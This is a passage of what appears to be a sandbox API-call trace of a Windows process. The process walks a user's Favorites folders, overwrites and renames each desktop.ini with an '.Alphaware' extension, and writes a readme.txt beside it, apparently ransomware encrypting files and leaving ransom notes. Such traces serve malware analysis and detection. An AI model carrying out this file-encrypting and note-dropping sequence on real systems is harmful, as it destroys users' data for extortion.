ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0088.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.350] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2442eb0 | out: lpFileInformation=0x2442eb0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0088.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.351] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.351] ReadFile (in: hFile=0x254, lpBuffer=0x2443270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2443270*, lpNumberOfBytesRead=0x23eb38*=0x192, lpOverlapped=0x0) returned 1 [0088.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.370] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.373] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86dead40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0088.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.373] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\favorites\\desktop.ini.alphaware")) returned 1 [0088.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0088.374] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\favorites\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0088.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x86dead40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86dead40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86dead40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0088.377] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dead40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86dead40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86dead40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.378] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0088.378] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.379] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.379] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.379] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0088.379] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.379] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24c7d70 | out: lpFileInformation=0x24c7d70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0088.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.380] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.380] ReadFile (in: hFile=0x254, lpBuffer=0x24c8010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24c8010*, lpNumberOfBytesRead=0x23ea98*=0x50, lpOverlapped=0x0) returned 1 [0088.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.400] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86e37000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x148)) returned 1 [0088.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.403] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\desktop.ini.alphaware")) returned 1 [0088.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0088.405] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0088.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.408] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x86e37000, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86e37000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.408] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86e37000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.408] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e37000, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86e37000, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86e37000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.408] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0088.408] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0088.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.410] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.410] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0088.410] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0088.410] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0088.410] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0088.411] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0088.411] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, 